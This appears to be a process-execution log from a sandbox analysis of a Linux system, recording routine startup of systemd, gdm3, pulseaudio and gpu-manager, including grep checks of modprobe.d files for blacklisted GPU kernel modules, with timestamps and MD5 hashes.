              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:23
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:23
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:23
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/pulseaudio
              Arguments:/usr/bin/pulseaudio --daemonize=no --log-target=journal
              File size:100832 bytes
              MD5 hash:0c3b4c789d8ffb12b25507f27e14c186

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/sbin/gdm3
              Arguments:-
              File size:453296 bytes
              MD5 hash:2492e2d8d34f9377e3e530a61a15674f

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/etc/gdm3/PrimeOff/Default
              Arguments:/etc/gdm3/PrimeOff/Default
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/sbin/gdm3
              Arguments:-
              File size:453296 bytes
              MD5 hash:2492e2d8d34f9377e3e530a61a15674f

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/etc/gdm3/PrimeOff/Default
              Arguments:/etc/gdm3/PrimeOff/Default
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/usr/sbin/gdm3
              Arguments:-
              File size:453296 bytes
              MD5 hash:2492e2d8d34f9377e3e530a61a15674f

              Start time (UTC):18:48:37
              Start date (UTC):02/04/2025
              Path:/etc/gdm3/PrimeOff/Default
              Arguments:/etc/gdm3/PrimeOff/Default
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:38
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:38
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:38
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/grep
              Arguments:grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              File size:199136 bytes
              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/grep
              Arguments:grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              File size:199136 bytes
              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/grep
              Arguments:grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              File size:199136 bytes
              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/grep
              Arguments:grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              File size:199136 bytes
              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/grep
              Arguments:grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              File size:199136 bytes
              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/grep
              Arguments:grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              File size:199136 bytes
              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/grep
              Arguments:grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
              File size:199136 bytes
              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:48:39
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:40
              Start date (UTC):02/04/2025
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:40
              Start date (UTC):02/04/2025
              Path:/usr/bin/grep
              Arguments:grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
              File size:199136 bytes
              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

              Start time (UTC):18:48:40
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:40
              Start date (UTC):02/04/2025
              Path:/usr/share/gdm/generate-config
              Arguments:/usr/share/gdm/generate-config
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:40
              Start date (UTC):02/04/2025
              Path:/usr/share/gdm/generate-config
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):18:48:40
              Start date (UTC):02/04/2025
              Path:/usr/bin/pkill
              Arguments:pkill --signal HUP --uid gdm dconf-service
              File size:30968 bytes
              MD5 hash:fa96a75a08109d8842e4865b2907d51f

              Start time (UTC):18:48:41
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:41
              Start date (UTC):02/04/2025
              Path:/usr/lib/gdm3/gdm-wait-for-drm
              Arguments:/usr/lib/gdm3/gdm-wait-for-drm
              File size:14640 bytes
              MD5 hash:82043ba752c6930b4e6aaea2f7747545

              Start time (UTC):18:48:52
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:52
              Start date (UTC):02/04/2025
              Path:/usr/sbin/gdm3
              Arguments:/usr/sbin/gdm3
              File size:453296 bytes
              MD5 hash:2492e2d8d34f9377e3e530a61a15674f

              Start time (UTC):18:48:52
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:52
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:52
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:52
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:48:52
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:49:12
              Start date (UTC):02/04/2025
              Path:/usr/libexec/gvfsd-fuse
              Arguments:-
              File size:47632 bytes
              MD5 hash:d18fbf1cbf8eb57b17fac48b7b4be933

              Start time (UTC):18:49:12
              Start date (UTC):02/04/2025
              Path:/bin/fusermount
              Arguments:fusermount -u -q -z -- /run/user/1000/gvfs
              File size:39144 bytes
              MD5 hash:576a1b135c82bdcbc97a91acea900566

              Start time (UTC):18:49:36
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:37
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:49:38
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:39
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:40
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:41
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:42
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:43
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/lib/systemd/systemd (deleted)
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
              File size:76616 bytes
              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

              Start time (UTC):18:49:44
              Start date (UTC):02/04/2025
              Path:/usr/bin/gpu-manager
              Arguments:-
